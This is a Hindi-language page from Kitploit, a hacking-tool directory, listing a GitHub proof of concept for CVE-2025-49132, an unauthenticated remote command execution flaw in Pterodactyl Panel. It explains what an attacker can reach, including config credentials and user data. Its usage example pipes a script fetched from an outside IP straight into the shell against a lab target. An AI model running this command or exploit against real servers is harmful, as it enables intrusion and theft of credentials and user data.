Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-49132 — यह दोष हमलावर को बिना किसी पूर्व प्रमाणीकरण के Pterodactyl Panel होस्ट करने वाले सर्वर पर मनमाने सिस्टम कमांड निष्पादित करने की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/4nuxd/cve-2025-49132
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHub4nuxd/cve-2025-49132

CVE-2025-49132

यह दोष हमलावर को बिना किसी पूर्व प्रमाणीकरण के Pterodactyl Panel होस्ट करने वाले सर्वर पर मनमाने सिस्टम कमांड निष्पादित करने की अनुमति देता है।

रिपॉजिटरी देखें
6 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

प्रभाव

/locales/locale.json का उपयोग करके locale और namespace क्वेरी पैरामीटर्स के साथ, एक दुर्भावनापूर्ण अभिनेता बिना प्रमाणीकरण के मनमाना कोड निष्पादित कर सकता है।

मनमाना कोड निष्पादित करने की क्षमता के साथ, इस भेद्यता का अनंत तरीकों से शोषण किया जा सकता है। इसका उपयोग पैनल के सर्वर तक पहुंच प्राप्त करने, पैनल के कॉन्फ़िग (.env या अन्य) से क्रेडेंशियल पढ़ने, डेटाबेस से संवेदनशील जानकारी निकालने (जैसे उपयोगकर्ता विवरण [उपयोगकर्ता नाम, ईमेल, पहला और अंतिम नाम, हैशेड पासवर्ड, आईपी पते, आदि]), पैनल द्वारा प्रबंधित सर्वरों की फ़ाइलों तक पहुंच आदि के लिए किया जा सकता है।

कैसे उपयोग करें

root@kitploit:~

python poc.py --target "pterodactyl.htb" --cmd 'curl http://10.10.14.22:8080/dbs.sh | sh' 

टूल डाउनलोड करें